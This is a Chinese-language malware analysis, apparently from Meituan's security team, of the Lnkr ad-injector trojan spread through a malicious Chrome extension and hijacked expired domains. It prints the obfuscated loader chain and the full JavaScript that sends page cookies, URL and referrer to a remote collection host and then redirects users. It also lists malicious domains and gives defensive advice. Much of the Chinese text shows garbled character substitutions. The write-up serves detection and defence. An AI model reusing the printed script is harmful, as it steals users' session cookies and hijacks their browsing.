导读
本文从黑产攻击方式、木马歹意行为、监控及进攻计划等角度对 Lnkr 木马进行剖析,此类木马影响范畴较广,攻打手法多样,但国内目前相干的材料却十分稀少,心愿本文的实践经验和总结能对从事相干平安检测的同学有所帮忙。
一、事件概述
2020 年 10 月,美团平安经营平台发现流量中存在歹意 JavaScript 申请,信息安全部收到告警后立刻开始应急解决,通过对网络环境、拜访日志等进行排查,最终锁定歹意申请由 Chrome 浏览器装置歹意插件引起,该歹意 JavaScript 文件会窃取 Cookie 并强制用户跳转到歹意色情站点、推广链接等,联合美团威逼情报大数据,发现该插件与 Lnkr Ad Injector 木马特色吻合。
此类木马传播方式多样,会通过浏览器插件、Broken Link Hijacking 等形式在页面中植入恶意代码,不仅重大影响用户失常拜访还会窃取用户数据。经追踪剖析发现,多个国内大型互联网站点(Alexa 全球排名前 600)被感化,影响上亿网民的上网平安,倡议各大平台对本身零碎第三方加载源以及外部终端设备进行查看,防止蒙受此类木马攻打。
二、溯源过程
2.1 平安经营平台收回异样告警
Chrome 沙箱监测到歹意 JavaScript 文件,收回异样告警:
通过告警信息判断根本的攻击行为是:
- 用户拜访失常页面;
- 页面加载内部 JavaScript 文件(A):http://s3.amazonaws.com/js-st…;
- A 加载第二个 JavaScript 文件(B):http://countsource.cool/18ced…;
- B 蕴含恶意代码,向近程域名发送 Cookie 等敏感信息。
2.2 分析攻击门路
依据告警中波及的触发页面、相干网络环境信息,排除流量劫持、XSS 攻打等状况,猜想可能的起因为浏览器插件或恶意软件导致。
通过沙箱对问题设施上所有 Chrome 插件进行剖析,发现一个名为 Vysor 的 Chrome 插件代码存在歹意行为,检测后果如下:
{
"call_window_location": {
"info": "get document.location",
"capture": []},
"call_document_createElement": {
"info": "call document.createElement, create script element",
"capture": [
"create element elementName:FIELDSET",
"create element elementName:FIELDSET",
"create element elementName:FIELDSET",
"create element elementName:FIELDSET",
"create element elementName:FIELDSET",
"create element elementName:INPUT",
"create element elementName:FIELDSET",
"create element elementName:FIELDSET",
"create element elementName:FIELDSET",
"create element elementName:FIELDSET",
"create element elementName:FIELDSET",
"create element elementName:SCRIPT",
"create element elementName:LINK"
]
},
"call_document_removeChild": {
"info": "call document.removeChild",
"capture": ["remove element {elementName:fieldset}",
"remove element {elementName:fieldset}",
"remove element {elementName:fieldset}"
]
},
"set_scriptSrcValue": {
"info": "set script src unsafe value",
"capture": ["//s3.amazonaws.com/js-static/18ced489204f8ff908.js"]
}
}
能够看到插件代码创立了 script 标签,而后将 script 标签的 src 属性设置为 //s3.amazonaws.com/js-static/18ced489204f8ff908.js
。
2.3 插件恶意代码剖析
为了进一步钻研该组织木马的特色,咱们对该歹意插件的代码进行了人工剖析。歹意插件的代码量较大,构造凌乱,蕴含大量烦扰代码。
首先恶意代码事后设置了许多无显著意义的字符串,用于结构 Payload。
这些字符串通过上面办法的一系列转换最终结构出创立 script 标签的语句 document’createElement’,doctype 即为创立进去的 script 对象。
接下来为 script 对象的 src 属性赋值,在 addHandler 办法中,cl 这个参数由 elem 传递过去,其中蕴含 src 字符串,通过 cl[0].split(‘>’).slice(2, 3) 拿到关键字 src,tag 是上文的 doctype 变量也就是 script 对象,在结构 src 值这部分,能够看到在常量中有一串一部分很像是 base64 的字符串:
mawaid = '^\\%|PCQxPjwkMT5zM|y5hbWF6b25hd3Mu|?:^[^\\\\]+?:\\%\\.*\t'
恶意代码利用该字符串联合其余预设变量进行一系列转换,最终造成 base64 后的加载地址 PCQxPjwkMT5zMy5hbWF6b25hd3MuY29tPCQxPmpzLXN0YXRpYzwkMT4xOGNlZDQ4OTIwNGY4ZmY5MDguanM:
通过 createLinkPseudo 办法解 base64,通过 replace 后造成歹意地址 //s3.amazonaws.com/js-static/18ced489204f8ff908.js。
s3.amazonaws.com/js-static/18ced489204f8ff908.js 的次要目标是加载下一层的歹意 Javascript 文件(//countsource.cool/18ced489204f8ff908.js),代码如下:
(function(){var a=document.createElement("script");a.src="//countsource.cool/18ced489204f8ff908.js";(document.head||document.documentElement).appendChild(a)})();;
//countsource.cool/18ced489204f8ff908.js 文件内容为:
(function () {function initXMLhttp() {
var xmlhttp;
if (window.XMLHttpRequest) {xmlhttp = new XMLHttpRequest();
} else {xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
return xmlhttp;
}
function minAjax(config) {if (!config.url) {return;}
if (!config.type) {return;}
if (!config.method) {config.method = true;}
if (!config.debugLog) {config.debugLog = false;}
var sendString = [],
sendData = config.data;
if (typeof sendData === "string") {var tmpArr = String.prototype.split.call(sendData, '&');
for (var i = 0, j = tmpArr.length; i < j; i++) {var datum = tmpArr[i].split('=');
sendString.push(encodeURIComponent(datum[0]) + "=" + encodeURIComponent(datum[1]));
}
} else if (typeof sendData === 'object' && !(sendData instanceof String)) {for (var k in sendData) {var datum = sendData[k];
if (Object.prototype.toString.call(datum) == "[object Array]") {for (var i = 0, j = datum.length; i < j; i++) {sendString.push(encodeURIComponent(k) + "[]=" + encodeURIComponent(datum[i]));
}
} else {sendString.push(encodeURIComponent(k) + "=" + encodeURIComponent(datum));
}
}
}
sendString = sendString.join('&');
if (window.XDomainRequest) {var xmlhttp = new window.XDomainRequest();
xmlhttp.onload = function () {if (config.success) {config.success(xmlhttp.responseText);
}
};
xmlhttp.open("POST", config.url);
xmlhttp.send(sendString);
} else {var xmlhttp = initXMLhttp();
xmlhttp.onreadystatechange = function () {if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {if (config.success) {config.success(xmlhttp.responseText, xmlhttp.readyState);
}
} else {}}
if (config.type == "GET") {xmlhttp.open("GET", config.url + "?" + sendString, config.method);
xmlhttp.send();}
if (config.type == "POST") {xmlhttp.open("POST", config.url, config.method);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.send(sendString);
}
}
}
dL();
function dL() {
var host = 'http://press.cdncontentdelivery.com/f';
var config = {
url: host + "/stats.php",
type: "POST",
data: {
vbase: document.baseURI,
vhref: location.href,
vref: document.referrer,
k: "Y291bnRzb3VyY2UuY29vbA==",
ck: document.cookie,
t: Math.floor(new Date().getTime() / 1000),
tg: ""
},
success: onSuccessCallback
};
function bl(resp) {! function (dr) {function t() {return !!localStorage && localStorage.getItem(a)
}
function e() {o(),
parent.top.window.location.href = c
}
function o() {
var t = r + i;
if (localStorage) {localStorage.setItem(a, t)
}
}
function n() {if (t()) {var o = localStorage && localStorage.getItem(a);
r > o && e()} else e()}
var a = "MenuIdentifier",
r = Math.floor((new Date).getTime() / 1e3),
c = dr,
i = 86400;
n()}(resp);
}
function onSuccessCallback(response) {if (response && response.indexOf('http') > -1) {bl(response);
}
}
minAjax(config);
}
})();
该文件是真正实现歹意行为的代码,这部分代码没有通过混同、加密,也没有退出其余无意义的代码烦扰剖析,能够很清晰地看到其歹意行为:
- 获取以后页面 Cookie,ck 参数;
- 获取以后页面 Referrer;
- 获取以后页面 Location;
- 应用 XMLHttpRequest 将获取到的数据发送到 http://press.cdncontentdelive…;
- 利用 onSuccessCallback 办法进行跳转。
至此实现了将 Cookie 发送到远端接管地址,后续通过 onSuccessCallback 返回内容实现跳转,残缺流程:
2.4 通过已发现的 IoC 深刻排查
通过上述特色,发现大量与 Lnkr 木马相干的域名和插件,局部并未呈现在已知的威逼情报中,经进一步剖析发现,挪动终端设备也有触发歹意申请的状况。
除此之外咱们也发现国内多个大型站点在本身援用资源上引入了 Lnkr 木马,用户如果拜访到这些站点,Cookie 信息会被间接发送到远端,存在极高的平安危险。针对站点本身存在歹意资源的这类状况,极有可能是攻击者利用 Broken Link Hijacking 的攻打手法,对过期域名进行抢注,站点在拜访原有资源时被劫持到歹意资源。
三、总结
3.1 歹意域名
以下列举了此次检测发现的歹意域名:
- mirextpro.com
- browfileext.com
- nextextlink.com
- lisegreen.biz
- makesure.biz
- clipsold.com
- comtakelink.xyz
- protesidenext.com
- promfflinkdev.com
- rayanplug.xyz
- countsource.cool
- blancfox.com
- skipush1.bbn.com.cn
- donewrork.org
- loungesrc.net
- higedev.cool
- s3.amazonaws.com/cashe-js/
- s3.amazonaws.com/js-cache/
- s3.amazonaws.com/jsfile/
- s3.amazonaws.com/cashe-js/
- cdngateway.net(接管 Cookie 域名)
- sslproviders.net(接管 Cookie 域名)
- cdncontentdelivery.com(接管 Cookie 域名)
3.2 歹意插件
排查到蕴含 Lnkr 木马特色的歹意插件:
局部歹意插件截图:
四、复盘
Lnkr 木马所造成的危害有哪些?
Lnkr 木马的外围域名之一 cdngateway.net 在寰球域名流量排名 8900 位,从流量起源角度,通过内部网站跳转带来的流量占比总流量的 65.48%,可见其攻打范畴极广,受其影响的利用、用户数量也是十分宏大的。
此类木马对外部用户和外部员工拜访同时具备严重危害。
在内部用户方面,如果企业没有严格控制系统第三方资源加载,黑产利用 Broken Link Hijacking 的攻打手法,以致业务零碎加载资源时被劫持植入恶意代码,将重大影响用户体验、信息安全和企业形象。
从外部员工角度,传统杀软、EDR 等终端安全设备并不能很好地辨认出此类歹意插件,攻击者通过流传歹意浏览器插件管制员工浏览器加载近程歹意资源,不仅仅能够用于广告注入,相较于针对浏览器的其余攻击方式,能够达到更稳固,触发面更广的敏感信息窃取、内网探测等,在 CSP 历史阻断的歹意申请中,咱们也发现除窃取 Cookie 信息外,也存在恶意代码窃取页面文本信息的状况,这些文本信息在企业外部平台中,极有可能蕴含大量用户,订单等敏感信息。
如何发现此类歹意木马植入?
针对歹意浏览器插件,在检测方面对其代码做动态剖析老本比拟大,触发歹意申请的 Payload 都是通过大量编码转换、拼接、正则匹配等结构而成、且通过了很多没有实际意义的办法,在动态分析方面,因为 Chrome 插件代码会调用 Chrome 后盾 API,在惯例沙箱环境中可能会呈现无奈调用 API 而中途报错退出。剖析中还发现,很多歹意行为须要触发特定事件能力进入到结构歹意 Payload 流程,如触发 chrome.tabs.onUpdated 等。
对于浏览器插件平安,能够通过以下形式进行检测及防护:
- 禁止装置未在 Chrome 利用商店上线的插件(公司外部开发的插件除外);
- 对插件 manfiest.json 文件进行轻量级的排查,manfiest.json 文件中申请权限绝对敏感,如 Cookie、tabs、webRequest 等等;
- 利用内容安全策略(CSP)对利用页面发动的申请进行拦挡或监控,联合动态与动态分析技术,判断 JavaScript 文件行为;
- 利用浏览器沙箱与 EDR,定期对浏览器插件进行扫描;
- 构建网络层的检测能力,发现有歹意申请及时应急解决。
对于业务零碎本身是否加载歹意资源方面:
- 严格控制系统加载的第三方资源;
- 通过内容安全策略(CSP)对页面触发的申请进行拦挡或监控。
总结
黑产组织利用此类木马进行歹意引流、窃取用户信息等,给用户拜访带来平安危险,也危害到企业本身形象,在 HTTPS 场景下,尽管排除了链路上用户拜访被劫持的危险,但用户端拜访环境安全性不定,为确保用户获取的信息牢靠,没有被篡改,依然须要进一步增强防护。心愿本文能给大家带来一些帮忙或者启发。
对于美团信息安全部
招聘信息
目前美团平安团队正在致力打造语言虚拟机—根底服务—下层利用的纵深利用平安体系,急需对研发安全感趣味的同学退出!如果你正好有求职意向且满足以下岗位要求,欢送投递简历至 sunny.fang@meituan.com(邮件主题请注明:研发平安专家 - 城市 - 美团 SRC)。
| 想浏览更多技术文章,请关注美团技术团队(meituantech)官网微信公众号。
| 在公众号菜单栏回复【2019 年货】、【2018 年货】、【2017 年货】、【算法】等关键词,可查看美团技术团队历年技术文章合集。